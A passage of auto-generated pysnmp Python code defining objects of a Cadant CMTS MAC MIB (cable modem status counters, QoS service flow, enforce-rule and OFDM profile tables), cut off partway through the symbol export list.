cadCmtsCmStatusMacNumTotal = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumTotal.setStatus('deprecated')
cadCmtsCmStatusMacNumRangingAborted = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRangingAborted.setStatus('deprecated')
cadCmtsCmStatusMacNumRangFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRangFlaps.setStatus('deprecated')
cadCmtsCmStatusMacNumProvFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 20), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumProvFlaps.setStatus('deprecated')
cadCmtsCmStatusMacNumRegFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 21), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRegFlaps.setStatus('deprecated')
cadCmtsCmStatusMacChSummaryTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27), )
if mibBuilder.loadTexts: cadCmtsCmStatusMacChSummaryTable.setStatus('current')
cadCmtsCmStatusMacChSummaryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1), ).setIndexNames((0, "CADANT-CMTS-LAYER2CMTS-MIB", "cadIfMacDomainIfIndex"), (0, "CADANT-CMTS-LAYER2CMTS-MIB", "cadMacChlChannelIfIndex"))
if mibBuilder.loadTexts: cadCmtsCmStatusMacChSummaryEntry.setStatus('current')
cadCmtsCmStatusMacChNumOther = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumOther.setStatus('current')
cadCmtsCmStatusMacChNumInitRanging = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumInitRanging.setStatus('current')
cadCmtsCmStatusMacChNumRangingComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRangingComplete.setStatus('current')
cadCmtsCmStatusMacChNumStartEae = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartEae.setStatus('current')
cadCmtsCmStatusMacChNumStartDhcpv4 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartDhcpv4.setStatus('current')
cadCmtsCmStatusMacChNumStartDhcpv6 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartDhcpv6.setStatus('current')
cadCmtsCmStatusMacChNumDhcpv4Complete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumDhcpv4Complete.setStatus('current')
cadCmtsCmStatusMacChNumDhcpv6Complete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumDhcpv6Complete.setStatus('current')
cadCmtsCmStatusMacChNumStartCfgFileDownload = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartCfgFileDownload.setStatus('current')
cadCmtsCmStatusMacChNumCfgFileDownloadComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumCfgFileDownloadComplete.setStatus('current')
cadCmtsCmStatusMacChNumStartRegistration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartRegistration.setStatus('current')
cadCmtsCmStatusMacChNumRegistrationComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRegistrationComplete.setStatus('current')
cadCmtsCmStatusMacChNumOperational = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumOperational.setStatus('current')
cadCmtsCmStatusMacChNumBpiInit = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumBpiInit.setStatus('current')
cadCmtsCmStatusMacChNumForwardingDisabled = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumForwardingDisabled.setStatus('current')
cadCmtsCmStatusMacChNumRfMuteAll = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 16), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRfMuteAll.setStatus('current')
cadCmtsCmStatusMacChNumTotal = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumTotal.setStatus('current')
cadCmtsCmStatusMacChNumRangingAborted = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRangingAborted.setStatus('current')
cadCmtsCmStatusMacChNumRangFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRangFlaps.setStatus('current')
cadCmtsCmStatusMacChNumProvFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 20), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumProvFlaps.setStatus('current')
cadCmtsCmStatusMacChNumRegFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 21), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRegFlaps.setStatus('current')
cadQosServiceFlowSidClusterTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28), )
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterTable.setStatus('current')
cadQosServiceFlowSidClusterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "DOCS-QOS3-MIB", "docsQosServiceFlowId"), (0, "DOCS-QOS3-MIB", "docsQosServiceFlowSidClusterId"), (0, "CADANT-CMTS-MAC-MIB", "cadQosServiceFlowSidClusterChIfIndex"))
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterEntry.setStatus('current')
cadQosServiceFlowSidClusterChIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterChIfIndex.setStatus('current')
cadQosServiceFlowSidClusterUcid = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterUcid.setStatus('current')
cadQosServiceFlowSidClusterSid = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterSid.setStatus('current')
cadQosServiceFlowSegHdr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosServiceFlowSegHdr.setStatus('current')
cadIfCmtsMacToInetIpTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29), )
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpTable.setStatus('current')
cadIfCmtsMacToInetIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsMacAddr"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsMacToInetIpAddrType"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsMacToInetIpAddr"))
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpEntry.setStatus('current')
cadIfCmtsMacToInetIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29, 1, 1), InetAddressType())
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpAddrType.setStatus('current')
cadIfCmtsMacToInetIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29, 1, 2), InetAddressIPv4or6())
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpAddr.setStatus('current')
cadIfCmtsMacToInetIpCmMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpCmMacAddr.setStatus('current')
cadEnforceRule = MibIdentifier((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30))
cadEnforceRuleTableLastChange = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 1), Counter32()).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadEnforceRuleTableLastChange.setStatus('current')
cadEnforceRuleTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2), )
if mibBuilder.loadTexts: cadEnforceRuleTable.setStatus('current')
cadEnforceRuleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadEnforceRuleReferenceSCN"))
if mibBuilder.loadTexts: cadEnforceRuleEntry.setStatus('current')
cadEnforceRuleReferenceSCN = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 1), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(1, 15)))
if mibBuilder.loadTexts: cadEnforceRuleReferenceSCN.setStatus('current')
cadEnforceRuleEnforceSCN = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 2), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 15))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleEnforceSCN.setStatus('current')
cadEnforceRuleAvgBwRateUsageTrigger = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 500000))).setUnits('kilobits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleAvgBwRateUsageTrigger.setStatus('current')
cadEnforceRuleAvgHistoryDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(30, 1440)).clone(60)).setUnits('minutes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleAvgHistoryDuration.setStatus('current')
cadEnforceRuleSamplingInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(5, 5), ValueRangeConstraint(10, 10), ValueRangeConstraint(15, 15), ValueRangeConstraint(30, 30), )).clone(15)).setUnits('minutes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleSamplingInterval.setStatus('current')
cadEnforceRulePenaltyDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(30, 10080)).clone(60)).setUnits('minutes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRulePenaltyDuration.setStatus('current')
cadEnforceRuleCreateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 7), Counter32()).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadEnforceRuleCreateTime.setStatus('current')
cadEnforceRuleStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 8), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleStatus.setStatus('current')
cadEnforceRuleCountsTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 3), )
if mibBuilder.loadTexts: cadEnforceRuleCountsTable.setStatus('current')
cadEnforceRuleCountsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 3, 1), )
cadEnforceRuleEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadEnforceRuleCountsEntry"))
cadEnforceRuleCountsEntry.setIndexNames(*cadEnforceRuleEntry.getIndexNames())
if mibBuilder.loadTexts: cadEnforceRuleCountsEntry.setStatus('current')
cadEnforceRuleCountsPenalties = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 3, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadEnforceRuleCountsPenalties.setStatus('current')
cadQosServiceClassControl = MibIdentifier((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31))
cadQosServiceClassControlTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 1), )
if mibBuilder.loadTexts: cadQosServiceClassControlTable.setStatus('current')
cadQosServiceClassControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 1, 1), )
docsQosServiceClassEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadQosServiceClassControlEntry"))
cadQosServiceClassControlEntry.setIndexNames(*docsQosServiceClassEntry.getIndexNames())
if mibBuilder.loadTexts: cadQosServiceClassControlEntry.setStatus('current')
cadQosServiceClassControlSendDsc = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 1, 1, 1), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadQosServiceClassControlSendDsc.setStatus('current')
cadQosServiceClassControlSendDscLastUpdated = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 1, 1, 2), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosServiceClassControlSendDscLastUpdated.setStatus('current')
cadQosServiceClassCmControlTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 2), )
if mibBuilder.loadTexts: cadQosServiceClassCmControlTable.setStatus('current')
cadQosServiceClassCmControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 2, 1), )
docsQosServiceClassEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadQosServiceClassCmControlEntry"))
cadQosServiceClassCmControlEntry.setIndexNames(*docsQosServiceClassEntry.getIndexNames())
if mibBuilder.loadTexts: cadQosServiceClassCmControlEntry.setStatus('current')
cadQosServiceClassCmControlSendDscMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 2, 1, 1), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadQosServiceClassCmControlSendDscMacAddr.setStatus('current')
cadIfCmtsCmOfdmStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32), )
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusTable.setStatus('current')
cadIfCmtsCmOfdmStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmOfdmStatusMacAddress"))
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusEntry.setStatus('current')
cadIfCmtsCmOfdmStatusMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusMacAddress.setStatus('current')
cadIfCmtsCmOfdmStatusOkOfdmMod = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 2), CerOfdmModBitsType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusOkOfdmMod.setStatus('current')
cadIfCmtsCmOfdmStatusOkOfdmaMod = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 3), CerOfdmModBitsType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusOkOfdmaMod.setStatus('current')
cadIfCmtsCmOfdmStatusDsLowFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusDsLowFreq.setStatus('current')
cadIfCmtsCmOfdmStatusDsHighFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusDsHighFreq.setStatus('current')
cadIfCmtsCmOfdmStatusUsHighFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusUsHighFreq.setStatus('current')
cadIfCmtsCmOfdmProfTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33), )
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfTable.setStatus('current')
cadIfCmtsCmOfdmProfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmOfdmProfMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmOfdmProfIfIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmOfdmProfProfId"))
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfEntry.setStatus('current')
cadIfCmtsCmOfdmProfMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfMacAddress.setStatus('current')
cadIfCmtsCmOfdmProfIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 2), InterfaceIndex())
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfIfIndex.setStatus('current')
cadIfCmtsCmOfdmProfProfId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 3), OfdmProfileId())
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfProfId.setStatus('current')
cadIfCmtsCmOfdmProfDirection = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 4), IfDirection()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfDirection.setStatus('current')
cadIfCmtsCmOfdmProfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("active", 1), ("impaired", 2))).clone('active')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfStatus.setStatus('current')
cadSubmgtFilterGrpDescTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34), )
if mibBuilder.loadTexts: cadSubmgtFilterGrpDescTable.setStatus('current')
cadSubmgtFilterGrpDescEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadSubmgtFilterGrpId"))
if mibBuilder.loadTexts: cadSubmgtFilterGrpDescEntry.setStatus('current')
cadSubmgtFilterGrpId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 1024)))
if mibBuilder.loadTexts: cadSubmgtFilterGrpId.setStatus('current')
cadSubmgtFilterGrpDescription = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34, 1, 2), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 32)).clone(hexValue="")).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadSubmgtFilterGrpDescription.setStatus('current')
cadSubmgtFilterGrpRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadSubmgtFilterGrpRowStatus.setStatus('current')
mibBuilder.exportSymbols("CADANT-CMTS-MAC-MIB", cadIfCmtsMacToInetIpEntry=cadIfCmtsMacToInetIpEntry, cadCmtsCmStatusNumRegistered=cadCmtsCmStatusNumRegistered, cadCmtsCmStatusMacNumRegFlaps=cadCmtsCmStatusMacNumRegFlaps, cadIfCmtsCmStatusModulationType=cadIfCmtsCmStatusModulationType, cadCmtsCmStatusSummaryEntry=cadCmtsCmStatusSummaryEntry, cadIfCmtsCmCountsRangeReqReceived=cadIfCmtsCmCountsRangeReqReceived, cadIfCmtsCmOfdmStatusDsLowFreq=cadIfCmtsCmOfdmStatusDsLowFreq, cadIfCmtsMacToInetIpAddrType=cadIfCmtsMacToInetIpAddrType, cadCmtsCmStatusMacChNumStartDhcpv4=cadCmtsCmStatusMacChNumStartDhcpv4, cadIfCmtsCmCountsRxPower=cadIfCmtsCmCountsRxPower, cadSubMgtCmFilterUpstream=cadSubMgtCmFilterUpstream, cadCmtsCmStatusMacNumBpiInit=cadCmtsCmStatusMacNumBpiInit, cadIfCmtsInetIpCmMac=cadIfCmtsInetIpCmMac, cadIf3CmtsCmRegStatusIPv6LinkLocal=cadIf3CmtsCmRegStatusIPv6LinkLocal, cadIfCmtsCmOfdmProfDirection=cadIfCmtsCmOfdmProfDirection, cadIfQosProfileLookupTable=cadIfQosProfileLookupTable, cadIfCmtsServiceMacAddress=cadIfCmtsServiceMacAddress, cadCmtsCmStatusMacNumStartDhcpv6=cadCmtsCmStatusMacNumStartDhcpv6, cadSubmgtFilterGrpDescTable=cadSubmgtFilterGrpDescTable, cadSubMgtCpeIpAddrType=cadSubMgtCpeIpAddrType, cadIfCmtsMacToInetIpCmMacAddr=cadIfCmtsMacToInetIpCmMacAddr, cadIfCmtsInetIpToCmMacEntry=cadIfCmtsInetIpToCmMacEntry, cadIfCmtsCmStatusLastDsPenaltyDuration=cadIfCmtsCmStatusLastDsPenaltyDuration, cadIf3CmtsCmRegStatusEnergyMgtOperStatus=cadIf3CmtsCmRegStatusEnergyMgtOperStatus, PYSNMP_MODULE_ID=cadMacMib, cadSubMgtCpeIpMacAddr=cadSubMgtCpeIpMacAddr, cadIfCmtsCmOfdmProfMacAddress=cadIfCmtsCmOfdmProfMacAddress, cadIfCmtsCmPtr=cadIfCmtsCmPtr, cadCmDenyEntry=cadCmDenyEntry, cadSubMgtPsFilterDownstream=cadSubMgtPsFilterDownstream, cadIf3CmtsCmRegStatusMdIfIndex=cadIf3CmtsCmRegStatusMdIfIndex, cadQosCmtsMacToSrvFlowTable=cadQosCmtsMacToSrvFlowTable, cadCmtsCmStatusNumRanging=cadCmtsCmStatusNumRanging, cadMacClearFlapCountMacAddr=cadMacClearFlapCountMacAddr, cadCmtsCmStatusNumIpComplete=cadCmtsCmStatusNumIpComplete, cadSubMgtCpeControlActive=cadSubMgtCpeControlActive, cadCmtsCmStatusMacChNumStartEae=cadCmtsCmStatusMacChNumStartEae, cadQosServiceClassLatencyControlledFlowFlag=cadQosServiceClassLatencyControlledFlowFlag, cadCmtsCmStatusMacSummaryEntry=cadCmtsCmStatusMacSummaryEntry, cadCmtsCmStatusMacChNumRfMuteAll=cadCmtsCmStatusMacChNumRfMuteAll, cadSubmgtFilterGrpDescEntry=cadSubmgtFilterGrpDescEntry, cadIfCmtsCmOfdmProfProfId=cadIfCmtsCmOfdmProfProfId, cadQosServiceFlowSidClusterSid=cadQosServiceFlowSidClusterSid, cadEnforceRuleTableLastChange=cadEnforceRuleTableLastChange, cadIfCmtsCmOfdmStatusOkOfdmMod=cadIfCmtsCmOfdmStatusOkOfdmMod, cadIfCmtsCmOfdmProfEntry=cadIfCmtsCmOfdmProfEntry, cadIfCmtsInetIpCpeMac=cadIfCmtsInetIpCpeMac, cadEnforceRuleAvgBwRateUsageTrigger=cadEnforceRuleAvgBwRateUsageTrigger, cadCmDenyStatusTable=cadCmDenyStatusTable, cadSubMgtCpeIpTable=cadSubMgtCpeIpTable, cadCmtsCmStatusNumRegFlaps=cadCmtsCmStatusNumRegFlaps, cadCmtsCmStatusMacNumOther=cadCmtsCmStatusMacNumOther, cadIfCmtsMacToIpTable=cadIfCmtsMacToIpTable, cadCmtsCmStatusMacNumCfgFileDownloadComplete=cadCmtsCmStatusMacNumCfgFileDownloadComplete, cadCmtsCmStatusMacChNumStartDhcpv6=cadCmtsCmStatusMacChNumStartDhcpv6, cadIfCmtsCmOfdmStatusUsHighFreq=cadIfCmtsCmOfdmStatusUsHighFreq, cadArpType=cadArpType, cadCmDenyRowStatus=cadCmDenyRowStatus, cadIfQosProfBaselinePrivacy=cadIfQosProfBaselinePrivacy, cadIf3CmtsCmStatsEm1x1ModeEntryTime=cadIf3CmtsCmStatsEm1x1ModeEntryTime, cadIf3CmtsCmRegStatusEnergyMgtCapability=cadIf3CmtsCmRegStatusEnergyMgtCapability, cadIfCmtsCmStatusDynamicSecretFailed=cadIfCmtsCmStatusDynamicSecretFailed, cadSubMgtCmFilterDownstream=cadSubMgtCmFilterDownstream, cadIfCmtsCmStatuseDocsisTypes=cadIfCmtsCmStatuseDocsisTypes, cadIfCmtsInetIpMacAddrType=cadIfCmtsInetIpMacAddrType, cadCmtsCmStatusMacNumStartEae=cadCmtsCmStatusMacNumStartEae, cadIf3CmtsCmStatsEm1x1ModeTotalDuration=cadIf3CmtsCmStatsEm1x1ModeTotalDuration, cadIfCmtsCmStatusTftpEnforceFailed=cadIfCmtsCmStatusTftpEnforceFailed, cadMacDeleteMacAddress=cadMacDeleteMacAddress, cadIfCmtsCmCountsUncorrectables=cadIfCmtsCmCountsUncorrectables, cadSubMgtCpeIpEntry=cadSubMgtCpeIpEntry, cadIfCmtsCmStatusBpiVersion=cadIfCmtsCmStatusBpiVersion, cadIfCmtsPtrToMacEntry=cadIfCmtsPtrToMacEntry, cadCmtsCmStatusMacChNumOperational=cadCmtsCmStatusMacChNumOperational, cadQosServiceClassControlEntry=cadQosServiceClassControlEntry, cadMacClearPenaltyCountScn=cadMacClearPenaltyCountScn, cadSubMgtStbFilterDownstream=cadSubMgtStbFilterDownstream, cadIfCmtsCmCountsTimingOffset=cadIfCmtsCmCountsTimingOffset, cadCmtsCmStatusNumRegistrationComplete=cadCmtsCmStatusNumRegistrationComplete, cadCmtsCmStatusNumTotal=cadCmtsCmStatusNumTotal, cadCmtsCmStatusMacChNumRangingComplete=cadCmtsCmStatusMacChNumRangingComplete, 